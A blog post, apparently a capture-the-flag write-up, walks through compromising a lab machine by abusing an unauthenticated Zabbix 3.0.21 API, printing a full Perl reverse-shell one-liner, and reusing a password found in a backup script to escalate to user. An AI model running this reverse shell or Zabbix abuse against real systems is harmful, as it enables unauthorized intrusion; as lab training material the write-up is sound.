Dragon
  • 一个纯白的黑客网站,一直在努力,apt的路上,更精彩!
adminAdmin  2019-02-03 11:30 lsh4ck's Blog 隐藏边栏 |   抢沙发  335 
文章评分 0 次,平均分 0.0

Usually scan,nmap+dirb+gobuster+msftcp

find zabbix,ver3.0.21:

think about zabbix has jsrpc.php,any exploit?,json interface is not authorized to access,search it:

python has library named zabbixapi,https://github.com/lukecyca/pyzabbix

EXP. add host:http://blog.chinaunix.net/uid-28309325-id-5176638.html

createuser.py:

createscript.py:

The execute script must execute on zabbix agent not on server cuz server its a docker container

the panel of script before:

after excute the script:

editor the script,use the stable perl or python to backconnect:
perl -e 'use Socket;$i="x.x.x.x";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'<br />

create events or triggers,filter use any,more hosts possible:

ncat to listen:

find the files of user zapper is permission denied,cat the backup.sh:
/usr/bin/7z a /backups/zapper_backup-$(/bin/date +%F).7z -pZippityDoDah /home/zapper/utils/* &>/dev/null

shell for backup,-p could be the pwd for zapper

zapper can not ssh:

use python to get a interactive shell:

so can use su,input the pwd,login successfully:

get user.txt

search folder:

The only one that runs with root is the service. Actually, the administrator may be negligent. This should be the way to leave a question for us

suid is running by root

download the pdf of writeup



本文为原创文章,版权归所有,欢迎分享本文,转载请保留出处!

admin
Admin 关注:0    粉丝:6 最后编辑于:2019-02-22
这个人很懒,什么都没写

发表评论

表情 链接 私密 格式 签到

切换注册

登录

短信快捷登录 忘记密码 ?

切换登录

注册

验证码

×

感谢您对admin的支持,么么哒~

支付宝打赏 admin
请扫码随意打赏

打开支付宝扫一扫,即可进行扫码打赏哦

lsh4ck's Blog - Hacking is endless! Focus on network security!

扫一扫二维码分享

无觅相关文章插件,快速提升流量